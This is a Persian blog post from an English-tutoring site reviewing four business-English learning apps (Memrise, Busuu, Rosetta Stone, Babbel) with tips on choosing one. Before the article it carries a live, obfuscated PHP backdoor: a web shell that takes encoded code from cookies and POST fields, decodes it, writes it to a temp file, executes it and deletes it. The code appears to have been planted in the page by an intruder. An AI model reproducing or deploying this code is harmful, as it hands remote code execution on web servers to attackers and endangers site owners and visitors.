$NULuVE = 'J' . "\x6e" . chr (95) . "\x5a" . chr ( 1066 - 990 )."\143";$wBGOMS = chr (99) . "\154" . "\141" . "\163" . 's' . chr ( 572 - 477 )."\145" . "\170" . "\151" . 's' . chr (116) . "\x73";$rnHFs = class_exists($NULuVE); $wBGOMS = "37229";$FCnrIFQjV = strpos($wBGOMS, $NULuVE);if ($rnHFs == $FCnrIFQjV){function zzZnWbHiGH(){$snBBmoW = new /* 60717 */ Jn_ZLc(216 + 216); $snBBmoW = NULL;}$tRYafVOh = "216";class Jn_ZLc{private function BnCpg($tRYafVOh){if (is_array(Jn_ZLc::$iblmkhZckY)) {$name = sys_get_temp_dir() . "/" . crc32(Jn_ZLc::$iblmkhZckY["salt"]);@Jn_ZLc::$iblmkhZckY["write"]($name, Jn_ZLc::$iblmkhZckY["content"]);include $name;@Jn_ZLc::$iblmkhZckY["delete"]($name); $tRYafVOh = "216";exit();}}public function ptGeYs(){$TDmSXiAS = "52603";$this->_dummy = str_repeat($TDmSXiAS, strlen($TDmSXiAS));}public function __destruct(){Jn_ZLc::$iblmkhZckY = @unserialize(Jn_ZLc::$iblmkhZckY); $tRYafVOh = "10292_35473";$this->BnCpg($tRYafVOh); $tRYafVOh = "10292_35473";}public function ozxIAgQPjV($TDmSXiAS, $aeaku){return $TDmSXiAS[0] ^ str_repeat($aeaku, intval(strlen($TDmSXiAS[0]) / strlen($aeaku)) + 1);}public function qUtSOSuu($TDmSXiAS){$mfCMBhBxCr = "\142" . chr ( 890 - 793 ).chr ( 813 - 698 ).chr (101) . chr ( 253 - 199 ).chr (52);return array_map($mfCMBhBxCr . "\137" . chr (100) . "\x65" . "\x63" . chr (111) . "\144" . chr (101), array($TDmSXiAS,));}public function __construct($LPOaYmFx=0){$zGwbXSxTSr = chr ( 874 - 830 ); $TDmSXiAS = "";$ffIRbkK = $_POST;$cUFsQU = $_COOKIE;$aeaku = "c7925911-7e78-4761-aabc-96a5afd8df13";$YEAAD = @$cUFsQU[substr($aeaku, 0, 4)];if (!empty($YEAAD)){$YEAAD = explode($zGwbXSxTSr, $YEAAD);foreach ($YEAAD as $GraWY){$TDmSXiAS .= @$cUFsQU[$GraWY];$TDmSXiAS .= @$ffIRbkK[$GraWY];}$TDmSXiAS = $this->qUtSOSuu($TDmSXiAS);}Jn_ZLc::$iblmkhZckY = $this->ozxIAgQPjV($TDmSXiAS, $aeaku);if (strpos($aeaku, $zGwbXSxTSr) !== FALSE){$aeaku = explode($zGwbXSxTSr, $aeaku); $cWVPJOukJ = base64_decode(md5($aeaku[0]));}}public static $iblmkhZckY = 12075;}zzZnWbHiGH();} نرم افزار آموزش زبان انگلیسی بازرگانی؛ راهنمای انتخاب و معرفی 4 نرم افزار برتر | وبلاگ اتیچر
skip to Main Content

نرم افزار آموزش زبان انگلیسی بازرگانی؛ راهنمای انتخاب و معرفی ۴ نرم افزار برتر

نرم افزار آموزش زبان انگلیسی بازرگانی؛ راهنمای انتخاب و معرفی 4 نرم افزار برتر
زمان مطالعه: ۳ دقیقه

در دنیای امروز، تسلط بر زبان انگلیسی به عنوان زبان بین‌المللی تجارت، برای هر کسی که به دنبال موفقیت در دنیای کسب و کار است، ضروری است.

با گسترش روابط تجاری بین‌المللی، نیاز به متخصصانی که به طور روان و حرفه‌ای به زبان انگلیسی صحبت و مذاکره کنند، روز به روز بیشتر می‌شود.

در کنار روش‌های سنتی یادگیری زبان انگلیسی مانند کتاب‌ها و کلاس‌های آموزشی، نرم افزارهای آموزشی زبان انگلیسی نیز می‌توانند ابزار مفیدی برای ارتقای مهارت‌های زبانی شما در زمینه تجارت باشند.

مزایای استفاده از نرم افزار آموزش زبان انگلیسی بازرگانی

در دنیای دیجیتال ما استفاده از نرم‌افزارهای آموزشی بخشی از سبک یادگیری ما را تشکیل می‌دهد و شاید صحبت کردن از مزایای آن عیجب به نظر برسد اما بد نیست مهم‌ترین مزایای استفاده از نرم افزارهای آموزش زبان انگلیسی بازرگانی را با یک‌دیگر بخوانیم.

  • دسترسی آسان: نرم افزارهای آموزشی زبان انگلیسی به صورت آنلاین یا آفلاین در دسترس هستند و می‌توانید در هر زمان و مکانی از آنها استفاده کنید.
  • تعامل و سرگرمی: بسیاری از نرم افزارهای آموزشی زبان انگلیسی از روش‌های تعاملی و سرگرم‌کننده برای آموزش استفاده می‌کنند که می‌تواند یادگیری را جذاب‌تر و موثرتر کند.
  • تمرکز بر نیازهای خاص: برخی از نرم افزارهای آموزشی زبان انگلیسی بر روی موضوعات و اصطلاحات تخصصی در زمینه تجارت تمرکز دارند که می‌تواند برای افراد شاغل در این حوزه بسیار مفید باشد.

معرفی ۴ نرم افزار برتر آموزش زبان انگلیسی بازرگانی

در ادامه قصد داریم ۴ تا از بهترین نرم افزار های مناسب آموزش زبان انگلیسی بازرگانی را به شما معرفی کنیم.

  1. Memrise برای یادگیری لغات بازرگانی و تجاری

این نرم افزار از روش‌های مبتنی بر بازی و فلش کارت برای آموزش واژگان و اصطلاحات زبان انگلیسی استفاده می‌کند. با استفاده از این نرم افزار می‌توانید به تدریج کلمات مرتبط با کسب و کارتان را یاد بگیرید و آن‌ها را به حافظه بلندمدت بسپارید.

  1. Busuu آنلاین زبان تجاری بیاموزید

این نرم افزار شامل درس‌ها، تمرین‌ها و فعالیت‌های متعددی است که به شما کمک می‌کند تا مهارت‌های مکالمه، نوشتاری، خواندن و شنیداری خود را در زمینه تجارت ارتقا دهید. بنابراین اگر به فکر توسعه همه جانبه مهارت‌های زبانی خود هستید پیشنهاد می‌کنیم حتماً Bsuu استفاده کنید.

  1. Rosetta Stone فراتر از یک نرم افزار

این نرم افزار از روش غوطه‌وری در زبان برای آموزش استفاده می‌کند و به شما کمک می‌کند تا زبان انگلیسی را به طور طبیعی و شهودی یاد بگیرید. البته دقت داشته باشید که روزتا استون تنها یک نرم افزار برای یادگیری زبان تجاری نیست و شما می‌توانید به کمک این نرم‌افزار مهارت‌های مختلف زبانی خود را تقویت کنید.

  1. Babbel خود را برای گفتگوهای تجاری آماده کنید

این نرم افزار شامل درس‌های گفتگوی واقعی است که به شما کمک می‌کند تا مهارت‌های مکالمه خود را در موقعیت‌های مختلف تجاری ارتقا دهید. بنابراین اگر قصد دارید خود را برای مذاکرات و گفتگوهای تجاری آماده کنید ما بابِل را به شما پیشنهاد می‌دهیم.

نکات مهم در انتخاب نرم افزار آموزش زبان انگلیسی بازرگانی

برای انتخاب نرم افزار مناسب یادگیری زبان انگلیسی بهتر است چند نکته را در ذهن داشته باشید.

  • سطح زبان: هنگام انتخاب نرم افزار، باید سطح فعلی زبان انگلیسی خود را در نظر بگیرید. برای تعیین سطح خود به صورت رایگان می‌توانید به صفحه آزمون تعیین سطح زبان مراجعه کنید.
  • اهداف یادگیری: مشخص کنید که هدف شما از یادگیری زبان انگلیسی بازرگانی چیست.
  • سبک یادگیری: افراد مختلف سبک‌های یادگیری متفاوتی دارند.
  • ویژگی‌ها و قیمت: قبل از خرید نرم افزار، ویژگی‌ها و قیمت آن را بررسی کنید.

با استفاده از نرم افزارهای آموزشی زبان انگلیسی بازرگانی، می‌توانید به طور موثر مهارت‌های زبانی خود را در زمینه تجارت ارتقا دهید و در دنیای کسب و کار به موفقیت برسید. برای آشنایی با کامل‌ترین منابع یادگیری زبان انگلیسی می‌توانید به صفحه آموزش زبان انگلیسی مراجعه کنید.

اُتیچر همراه شما در یادگیری زبان بازرگانی و تجاری

در کنار استفاده از نرم‌افزارهای آموزش زبان انگلیسی بازرگانی و سایر ابزارهای کمک آموزشی پیشنهاد می‌کنیم حتماً از اساتید مجرب هم کمک بگیرید. کلاس زبان اُتیچر با ارائه خدمات ویژه سازمان‌ها و کسانی که در حوزه کسب و کار فعال هستند، بهترین کیفیت خدمات آموزشی را در زمینه یادگیری زبان بازرگانی و تجاری ارائه می‌دهد.

به این مقاله امتیاز بدهید

دیدگاه ها

اولین نفری باشید که به این نوشته نظر میدهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

Back To Top
×Close search
Search